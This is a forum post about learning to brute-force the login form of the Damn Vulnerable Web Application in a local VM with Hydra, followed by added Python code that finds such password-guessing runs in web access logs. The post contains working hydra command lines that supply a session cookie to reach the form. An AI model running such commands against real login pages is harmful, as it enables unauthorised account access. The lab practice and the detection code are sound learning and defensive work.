
Author Topic: Hydra and DVWA in a VM - redirect to login.php  (Read 1182 times)

zoup
« on: August 30, 2015, 12:54:25 PM »
Hi there, I am using hydra and the damn vulnerable web application
to learn brute forcing with hydra.

The URL I try to hack is:
/dvwa/vulnerabilities/brute/

The thing is I get a redirect to the main page where I must
authorize. I brute forced the login.php already with success.

Code:
[VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php

So my question is:
How can I brute-force this web form when I have to first authorize
at the login.php? I can't reach the brute page.

My commandline:

Code:
hydra -vV -l admin -P pw/25common.txt 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:password incorrect"

EDIT:
I figured it out. Of course it was the cookie.

Code:
hydra -vV -l admin -P pw/25common.txt 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:password incorrect:H=Cookie: security=low; PHPSESSID=<phpsessid>"
« Last Edit: August 30, 2015, 01:46:39 PM by zoup »
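
Seen from the defender's side, the http-get-form requests in the post carry the username and password in the query string, so every attempt ends up in the web server's access log. The following is an added example, not part of the original post, that flags this pattern; the log lines are constructed, and the 60-second window and threshold of 5 distinct passwords are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

TARGET = "/dvwa/vulnerabilities/brute/"  # form path from the post
LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+" \d{3}')

# Constructed sample log (not from the post): one client cycling passwords
# for "admin", and a second client making a single attempt.
GUESSES = ["123456", "password", "qwerty", "letmein", "dragon", "monkey"]
SAMPLE_LOG = "\n".join(
    [f'192.168.56.1 - - [30/Aug/2015:13:40:{i:02d} +0000] "GET {TARGET}'
     f'?username=admin&password={pw}&Login=Login HTTP/1.0" 200 4821'
     for i, pw in enumerate(GUESSES)]
    + [f'192.168.56.7 - - [30/Aug/2015:13:41:10 +0000] "GET {TARGET}'
       f'?username=admin&password=hunter2&Login=Login HTTP/1.1" 200 4900'])

def parse(line):
    """Return (ip, username, password, time) for a login attempt, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, stamp, target = m.groups()
    url = urlsplit(target)
    query = parse_qs(url.query)
    if url.path != TARGET or "username" not in query or "password" not in query:
        return None
    when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
    return ip, query["username"][0], query["password"][0], when

def detect(log_text, window=timedelta(seconds=60), threshold=5):
    """Flag (ip, username) pairs that try >= threshold distinct passwords
    inside any sliding window; returns [(ip, username, distinct_count)]."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec:
            attempts[rec[0], rec[1]].append((rec[3], rec[2]))
    alerts = []
    for (ip, user), events in attempts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {pw for _, pw in events[start:end + 1]}
            if len(distinct) >= threshold:
                alerts.append((ip, user, len(distinct)))
                break
    return alerts
```

Because the form uses GET, the guessed passwords are written to the access log in clear text, so such logs should be handled as sensitive data.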

 


